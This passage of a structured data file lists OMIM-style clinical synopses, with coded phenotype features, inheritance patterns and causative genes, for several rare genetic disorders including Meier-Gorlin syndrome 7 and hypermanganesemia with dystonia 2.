'headAndNeckFace': '''Dysmorphic features, variable {UMLS C4015145};\nMicrognathia {SNOMEDCT:32958008} {UMLS C0025990 HP:0000347} {HPO HP:0000347 C0025990,C0240295,C1857130} {EOM ID:8bbf61b4ad7ca2ef IMG:Micrognathia-small.jpg}''',
'headAndNeckEars': '''Low-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nFolded ears {UMLS C1851901}''',
'headAndNeckEyes': '''Hypertelorism {SNOMEDCT:22006008} {ICD10CM:Q75.2} {ICD9CM:376.41} {UMLS C0020534 HP:0000316} {HPO HP:0000316 C0020534} {EOM ID:71d9f1be67c7f8b6 IMG:Eyes,Widely_Spaced-small.jpg};\nEpicanthal folds {SNOMEDCT:74824007} {UMLS C0229249,C0678230 HP:0000286} {HPO HP:0000286 C0678230};\nArched eyebrows {UMLS C1868571 HP:0002553} {HPO HP:0002553 C1868571,C4020849};\nSynophrys {SNOMEDCT:253207002} {UMLS C0431447 HP:0000664} {HPO HP:0000664 C0431447} {EOM ID:5e417df50b2316f4 IMG:Synophrys-small.jpg};\nPtosis {SNOMEDCT:11934000,29696001} {ICD10CM:H02.4,H02.40,H02.409} {ICD9CM:374.3,374.30} {UMLS C0005745,C0033377 HP:0000508} {HPO HP:0000508 C0005745} {EOM ID:1bd157b764ec7aea IMG:Ptosis-small.jpg}''',
'headAndNeckNose': '''Broad nasal bridge {SNOMEDCT:249321001} {UMLS C1849367 HP:0000431} {HPO HP:0000431 C1839764,C1849367} {EOM ID:e29866db35162165 IMG:Nasal_Bridge,Wide-small.jpg};\nUpturned nose {SNOMEDCT:708670007} {UMLS C1840077 HP:0000463} {HPO HP:0000463 C1840077}''',
'headAndNeckMouth': '''High palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635} {EOM ID:51755789482fe3a8 IMG:Palate,High-small.jpg};\nThin upper lip {UMLS C1865017 HP:0000219} {HPO HP:0000219 C1865017}''',
'cardiovascularHeart': 'Congenital heart defects (in some patients) {UMLS C1970347} {HPO HP:0001627 C0018798,C0152021}',
'abdomenGastrointestinal': '''Feeding difficulties {SNOMEDCT:78164000} {ICD10CM:R63.3} {UMLS C0232466 HP:0011968} {HPO HP:0011968 C0232466};\nConstipation {SNOMEDCT:14760008} {ICD10CM:K59.0,K59.00} {ICD9CM:564.0,564.00} {UMLS C1963087,C0009806,C3641755,C4084722,C4084723,C4084724 HP:0002019} {HPO HP:0002019 C0009806,C0237326};\nGastric reflux {SNOMEDCT:225587003,698065002,235595009} {ICD10CM:K21,K21.9} {ICD9CM:530.81} {UMLS C0558176,C4317146,C0017168 HP:0002020}''',
'skeletal': 'Joint hyperextensibility (1 patient) {UMLS C4313933} {HPO HP:0001382 C1844820}',
'skeletalSpine': 'Scoliosis (1 patient) {UMLS C2750812} {HPO HP:0002650 C0037932,C0700208}',
'skeletalHands': '''Clinodactyly {SNOMEDCT:17268007} {UMLS C4551485,C0265610 HP:0030084,HP:0040019} {HPO HP:0030084 C0265610,C4280304} {EOM ID:483af428f909c76c IMG:Clinodactyly-small.jpg};\nBrachydactyly {SNOMEDCT:43476002} {UMLS C0221357 HP:0001156} {HPO HP:0001156 C0221357}''',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability {SNOMEDCT:110359009,228156007} {ICD9CM:317-319.99} {UMLS C3714756 HP:0001249} {HPO HP:0001249 C0025362,C0423903,C0917816,C1843367,C3714756,C4020876};\nDelayed speech {SNOMEDCT:229721007} {UMLS C0241210 HP:0000750} {HPO HP:0000750 C0023012,C0233715,C0241210,C0454644};\nPoor or absent speech {UMLS C3278212};\nAtonic seizures (1 patient) {UMLS C4313935} {HPO HP:0010819 C0270846,C1836509};\nPachygyria (1 patient) {UMLS C2749587} {HPO HP:0001302 C0266483};\nSimplified gyral pattern {UMLS C2749675 HP:0009879} {HPO HP:0009879 C2749675}''',
'neurologicBehavioralPsychiatricManifestations': '''Behavioral problems {SNOMEDCT:277843001,25786006} {UMLS C0233514 HP:0000708} {HPO HP:0000708 C0004941,C0233514};\nTantrums {SNOMEDCT:83943005} {UMLS C0233558};\nVolatile mood {SNOMEDCT:225657003} {UMLS C0558222};\nHand-flapping {SNOMEDCT:247922007} {UMLS C0424247};\nAttention deficit-hyperactivity disorder {SNOMEDCT:406506008,7461003} {ICD10CM:F90,F90.9} {ICD9CM:314.9,314.01,314} {UMLS C1263846 HP:0007018} {HPO HP:0007018 C1263846}''',
'immunology': '''Hypogammaglobulinemia (in some patients) {UMLS C3810300} {HPO HP:0004313 C0086438,C4048270};\nIgA deficiency {SNOMEDCT:29260007} {UMLS C0162538 HP:0002720} {HPO HP:0002720 C0162538};\nIgG deficiency {SNOMEDCT:123785006,12631000119106,190981001} {ICD10CM:D80.3} {UMLS C4520847,C0162539 HP:0004315} {HPO HP:0004315 C0162539}''',
'miscellaneous': 'Variable phenotype {UMLS C1837514 HP:0003812} {HPO HP:0003812 C1837514,C1839039,C1850667,C1866210}',
'molecularBasis': 'Caused by mutation in the casein kinase II, alpha-1 gene (CSNK2A1, {115440.0001}).',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': True,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': True,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617013,
'prefix': '#',
'preferredTitle': 'HYPERMANGANESEMIA WITH DYSTONIA 2; HMNDYT2',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly, acquired (in some patients) {UMLS C3809179} {HPO HP:0005484 C1847514}',
'headAndNeckMouth': '''Bulbar dysfunction {UMLS C1839041};\nOromandibular dystonia {UMLS C2242577 HP:0012048} {HPO HP:0012048 C2242577}''',
'skeletal': 'Joint contractures {SNOMEDCT:7890003} {ICD10CM:M24.5} {ICD9CM:718.40,718.4} {UMLS C0009918 HP:0001371} {HPO HP:0001371 C0009917,C0009918,C0333068,C1850530}',
'skeletalSpine': 'Scoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208}',
'muscleSoftTissue': 'Axial hypotonia {UMLS C1853743 HP:0008936} {HPO HP:0008936 C1853743}',
'neurologicCentralNervousSystem': '''Developmental regression {SNOMEDCT:609225004} {UMLS C1836830 HP:0002376} {HPO HP:0002376 C1836550,C1836830,C1850493,C1855009,C1855019,C1855996,C1857121,C1859678};\nDevelopmental delay (in some patients) {UMLS C3278623} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability, variable {UMLS C4230864} {HPO HP:0001249 C0025362,C0423903,C0917816,C1843367,C3714756,C4020876};\nLearning disability {SNOMEDCT:1855002,408468001} {ICD10CM:F81.9} {UMLS C1321592,C0751265};\nPoor or absent speech (in some patients) {UMLS C4314139};\nDystonia {SNOMEDCT:15802004} {ICD10CM:G24,G24.9} {UMLS C0393593,C0013421 HP:0001332} {HPO HP:0001332 C0013421,C4020871};\nSpasticity {SNOMEDCT:221360009,397790002} {UMLS C0026838,C4553743 HP:0001257} {HPO HP:0001257 C0026838};\nAbnormal gait {SNOMEDCT:22325002} {ICD9CM:781.2} {UMLS C0575081 HP:0001288} {HPO HP:0001288 C0575081};\nScissoring {SNOMEDCT:64973003} {UMLS C0175735,C3890157};\nHyperreflexia {SNOMEDCT:86854008} {UMLS C0151889 HP:0001347} {HPO HP:0001347 C0151889};\nAnkle clonus {SNOMEDCT:39055007} {UMLS C0238651 HP:0011448} {HPO HP:0011448 C0238651};\nExtensor plantar responses {SNOMEDCT:246586009,366575004} {UMLS C0034935 HP:0003487} {HPO HP:0003487 C0034935};\nBulbar dysfunction {UMLS C1839041};\nLoss of independent ambulation {UMLS C3278950};\nParkinsonism {SNOMEDCT:32798002} {UMLS C0242422 HP:0001300} {HPO HP:0001300 C0242422};\nBradykinesia {SNOMEDCT:399317006} {UMLS C0233565 HP:0002067} {HPO HP:0002067 C0233565};\nTremor {SNOMEDCT:26079004} {ICD10CM:R25.1} {UMLS C0040822,C4554265,C1963252 HP:0001337} {HPO HP:0001337 C0040822};\nDyskinetic movements {UMLS C2678069};\nBrain MRI shows Mn deposition in the deep gray matter and white matter {UMLS C4314138};\nCerebral atrophy (in some patients) {UMLS C3808452} {HPO HP:0002059 C0154671,C0235946,C4020860};\nCerebellar atrophy (in some patients) {UMLS C3806758} {HPO HP:0001272 C0262404,C0740279,C4020873}''',
'laboratoryAbnormalities': 'Increased blood manganese {UMLS C0855887}',
'miscellaneous': '''Onset in infancy or first years of life {UMLS C3806309};\nProgressive disorder {UMLS C1864985 HP:0003676} {HPO HP:0003676 C0205329,C1864985};\nSome patients may respond to early chelation therapy {UMLS C4314136}''',
'molecularBasis': 'Caused by mutation in the solute carrier family 39 (zinc transporter), member 14 gene (SLC39A14, {608736.0001}).',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617063,
'prefix': '#',
'preferredTitle': 'MEIER-GORLIN SYNDROME 7; MGORS7',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Short stature {SNOMEDCT:422065006,237837007,237836003} {ICD10CM:R62.52,E34.3} {ICD9CM:783.43} {UMLS C0013336,C0349588,C2237041,C2919142 HP:0004322,HP:0003510} {HPO HP:0004322 C0349588}',
'growthWeight': 'Low weight {SNOMEDCT:248342006} {ICD10CM:R63.6} {ICD9CM:783.22} {UMLS C0041667 HP:0004325} {HPO HP:0004325 C0041667,C1262477,C1844806}',
'growthOther': 'Growth failure, progressive {UMLS C4313929}',
'headAndNeckHead': '''Craniosynostosis {SNOMEDCT:57219006} {ICD10CM:Q75.0} {UMLS C0010278 HP:0005458,HP:0001363} {HPO HP:0001363 C0010278,C0235942};\nMicrocephaly, progressive {UMLS C1850456 HP:0000253} {HPO HP:0000253 C1850456}''',
'headAndNeckEars': '''Microtia {SNOMEDCT:35045004} {ICD10CM:Q17.2} {ICD9CM:744.23} {UMLS C1657142,C0152423 HP:0008551} {HPO HP:0008551 C0152423};\nHearing loss {SNOMEDCT:15188001,343087000,103276001} {ICD10CM:H91.9} {ICD9CM:389,389.9} {UMLS C3887873,C2029884,C1384666,C0018772,C0011053 HP:0000365} {HPO HP:0000365 C0011053,C0018772,C0339789,C1384666}''',
'headAndNeckEyes': '''Thin eyebrows {UMLS C4281771 HP:0045074} {HPO HP:0045074};\nProptosis {SNOMEDCT:18265008} {ICD10CM:H05.20} {ICD9CM:376.30} {UMLS C0015300 HP:0000520} {HPO HP:0000520 C0015300,C1837760,C1848490,C1862425} {EOM ID:765f49f1e824f0d2 IMG:Proptosis-small.jpg};\nStrabismus {SNOMEDCT:22066006,128602000} {ICD10CM:H50.40,H50.9} {ICD9CM:378.30} {UMLS C2020541,C1423541,C0038379 HP:0032012,HP:0000486} {HPO HP:0000486 C0038379};\nMyopia {SNOMEDCT:57190000} {ICD10CM:H52.1} {ICD9CM:367.1} {UMLS C0027092 HP:0000545} {HPO HP:0000545 C0027092}''',
'headAndNeckNose': 'Choanal atresia {SNOMEDCT:204508009} {ICD10CM:Q30.0} {ICD9CM:748.0} {UMLS C0008297 HP:0000453} {HPO HP:0000453 C0008297}',
'headAndNeckMouth': '''Small mouth {SNOMEDCT:14582003} {ICD10CM:Q18.5} {ICD9CM:744.84} {UMLS C0026034 HP:0000160} {HPO HP:0000160 C0026034};\nHigh palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635} {EOM ID:51755789482fe3a8 IMG:Palate,High-small.jpg};\nCleft palate {SNOMEDCT:87979003,63567004} {ICD10CM:Q35.5,Q35,Q35.9} {ICD9CM:749.0,749.00} {UMLS C2981150,C0008925,C2240378 HP:0000175} {HPO HP:0000175 C0008925,C2981150}''',
'cardiovascularHeart': '''Atrial septal defect {SNOMEDCT:70142008,253366007,405752007} {ICD10CM:Q21.1} {UMLS C0018817 HP:0001631} {HPO HP:0001631 C0018817};\nVentricular septal defect {SNOMEDCT:30288003,768552007,253549006} {ICD10CM:Q21.0} {ICD9CM:745.4} {UMLS C0018818 HP:0001629} {HPO HP:0001629 C0018818};\nAtrioventricular canal {SNOMEDCT:253414002,15459006,77469004} {ICD10CM:Q21.2} {ICD9CM:745.60,745.6} {UMLS C1389018,C0231081,C0014116 HP:0001674,HP:0006695} {HPO HP:0001674 C1389018};\nAtrioventricular conduction block {SNOMEDCT:233917008} {ICD10CM:I44.3,I44.30} {ICD9CM:426.10} {UMLS C0004245 HP:0001678}''',
'respiratoryLung': 'Pulmonary hypoplasia (in 1 patient) {UMLS C4313917} {HPO HP:0002089 C0265783}',
'chestBreasts': 'Breast agenesis {UMLS C1386985}',
'abdomenGastrointestinal': '''Anterior anus {UMLS C4313928};\nAnal stenosis {SNOMEDCT:250037002,69914001} {UMLS C0262374,C4551936 HP:0002025} {HPO HP:0002025 C0262374};\nImperforate anus {SNOMEDCT:204731006,204712000} {ICD10CM:Q42.3} {UMLS C0003466 HP:0002023} {HPO HP:0002023 C0003466};\nAnorectal malformation {SNOMEDCT:33225004} {UMLS C3495676 HP:0012732};\nDuodenal stenosis {SNOMEDCT:73120006} {ICD10CM:K31.5} {UMLS C0238093,C4553901 HP:0100867} {HPO HP:0100867 C0238093,C1860791}''',
'genitourinaryExternalGenitaliaMale': '''Hypospadias {SNOMEDCT:416010008,204888000} {ICD10CM:Q54.1,Q54.9,Q54} {ICD9CM:752.61} {UMLS C1691215,C0848558 HP:0003244,HP:0000047} {HPO HP:0000047 C1691215};\nMicropenis {SNOMEDCT:34911001} {ICD10CM:Q55.62} {ICD9CM:752.64} {UMLS C1387005,C4551492,C0266435 HP:0000054,HP:0008736} {HPO HP:0000054 C0266435};\nUrethral stricture {SNOMEDCT:236647003,76618002} {ICD10CM:N35.9,N35.919,N35} {ICD9CM:598,598.9} {UMLS C4551691,C0041974 HP:0012227,HP:0008661} {HPO HP:0012227 C0041974}''',
'genitourinaryExternalGenitaliaFemale': 'Clitoromegaly {SNOMEDCT:80212005} {ICD10CM:N90.89} {ICD9CM:624.2} {UMLS C0156394 HP:0008665} {HPO HP:0008665 C0156394}',
'genitourinaryInternalGenitaliaMale': 'Undescended testes {SNOMEDCT:204878001} {ICD10CM:Q53.9} {ICD9CM:752.51} {UMLS C0010417 HP:0000028} {HPO HP:0000028 C0010417}',
'genitourinaryUreters': 'Vesicoureteral reflux {SNOMEDCT:197811007} {ICD10CM:N13.7,N13.70} {ICD9CM:593.7} {UMLS C0042580 HP:0000076} {HPO HP:0000076 C0042580}',
'skeletalSkull': '''Microcephaly, progressive {UMLS C1850456 HP:0000253} {HPO HP:0000253 C1850456};\nUnicoronal or bicoronal craniosynostosis {UMLS C4313927};\nLambdoid or bilateral lambdoid craniosynostosis {UMLS C4313926};\nSagittal craniosynostosis {SNOMEDCT:109418001} {UMLS C0432123 HP:0004442} {HPO HP:0004442 C0432123};\nLarge anterior fontanel {UMLS C1866134 HP:0000260} {HPO HP:0000260 C1866134};\nCopper-beaten appearance of skull {UMLS C4227980}''',
'skeletalSpine': '''Scoliosis (in 1 patient) {UMLS C2750812} {HPO HP:0002650 C0037932,C0700208};\nC1-C3 fusion (in 1 patient) {UMLS C4313925};\nC4-C7 fusion (in 1 patient) {UMLS C4313924};\nThoracic vertebral segmentation defects (in 1 patient) {UMLS C4313923}''',
'skeletalLimbs': '''Patellar aplasia/hypoplasia {UMLS C1868577 HP:0006498} {HPO HP:0006498 C1868577};\nBilateral radial head dislocation {UMLS C4313922};\nBowed legs (in 1 patient) {UMLS C4313766} {HPO HP:0002979 C0544755};\nJoint laxity (in 1 patient) {UMLS C4313921} {HPO HP:0001388 C0086437,C0158359}''',
'skeletalHands': '''Digital clubbing (in 1 patient) {UMLS C4313920} {HPO HP:0001217 C0149651};\nSyndactyly of second, third, and fourth fingers, mild (in 1 patient) {UMLS C4313919};\nPreaxial polydactyly, bilateral (in 1 patient) {UMLS C4313918} {HPO HP:0100258 C0345354}''',
'skeletalFeet': 'Syndactyly of second and third toes {UMLS C4551570 HP:0004691} {HPO HP:0004691 C0432040}',
'neurologicCentralNervousSystem': '''Developmental delay, mild to severe {UMLS C2673867} {HPO HP:0001263 C0557874,C1864897,C4020875};\nChiari I malformation (in 1 patient) {UMLS C4313930} {HPO HP:0007099 C0750929}''',
'molecularBasis': 'Caused by mutation in the cell division cycle 45, S. cerevisiae, homolog-like gene (CDC45L, {603465.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': True,
'cardiovascularHeartExists': True,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': True,
'chestExists': True,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': True,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': True,
'genitourinaryExternalGenitaliaFemaleExists': True,
'genitourinaryInternalGenitaliaMaleExists': True,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': True,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': True,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': True,
'skeletalHandsExists': True,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': False,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617014,
'prefix': '#',
'preferredTitle': 'NEUTROPENIA, SEVERE CONGENITAL, 7, AUTOSOMAL RECESSIVE; SCN7',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'immunology': '''Recurrent infections {SNOMEDCT:451991000124106} {UMLS C0239998 HP:0002719} {HPO HP:0002719 C0239998};\nNeutropenia {SNOMEDCT:303011007,165517008,84828003} {ICD10CM:D70,D70.9,D72.819} {ICD9CM:288.50,288.0,288.00} {UMLS C0027947,C0023530,C0853697 HP:0001882,HP:0001875} {HPO HP:0001875 C0853697};\nBone marrow shows normal myeloid maturation {UMLS C4314135};\nPoor response to G-CSF {UMLS C4314134}''',
'miscellaneous': '''Onset in infancy or early childhood {UMLS C1837138};\nSome patients may show a response to GM-CSF treatment {UMLS C4314133}''',
'molecularBasis': 'Caused by mutation in the colony-stimulating factor 3 receptor, granulocyte gene (CSF3R, {138971.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617065,
'prefix': '#',
'preferredTitle': 'EPILEPTIC ENCEPHALOPATHY, EARLY INFANTILE, 40; EIEE40',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEyes': 'Poor or absent eye contact {UMLS C4313913}',
'muscleSoftTissue': 'Hypotonia, axial {UMLS C1853743 HP:0008936}',
'neurologicCentralNervousSystem': '''Epileptic encephalopathy {SNOMEDCT:723125008} {UMLS C0543888 HP:0200134} {HPO HP:0200134 C0543888};\nSeizures, refractory {UMLS C2676167};\nHypsarrhythmia {SNOMEDCT:28055006} {ICD10CM:G40.82} {ICD9CM:345.6} {UMLS C0684276,C0037769 HP:0011097,HP:0002521} {HPO HP:0002521 C0684276};\nArrest of development {UMLS C1408660};\nMental retardation, profound {SNOMEDCT:31216003} {ICD10CM:F73} {UMLS C0020796 HP:0002187} {HPO HP:0002187 C0020796,C3161330};\nSpasticity {SNOMEDCT:221360009,397790002} {UMLS C0026838,C4553743 HP:0001257} {HPO HP:0001257 C0026838};\nDystonic fits {UMLS C4313915};\nMyoclonus {SNOMEDCT:17450006} {ICD10CM:G25.3} {ICD9CM:333.2} {UMLS C0027066 HP:0001336} {HPO HP:0001336 C0027066,C1854302};\nChoreoathetosis {SNOMEDCT:43105007} {UMLS C0085583 HP:0001266} {HPO HP:0001266 C0085583,C0234967};\nInability to handle objects {UMLS C4313914};\nCortical atrophy {SNOMEDCT:278849000} {UMLS C0235946,C4551583 HP:0002120,HP:0002059} {HPO HP:0002120 C0235946}''',
'miscellaneous': '''Onset of seizures in early infancy {UMLS C4313912};\nOne consanguineous Algerian family has been reported (last curated August 2016) {UMLS C4313911}''',
'molecularBasis': 'Caused by mutation in the GUF1 GTPase, S. Cerevisiae, homolog of, gene (GUF1, {617064.0001}).',
'inheritanceExists': True,
'growthExists': False,
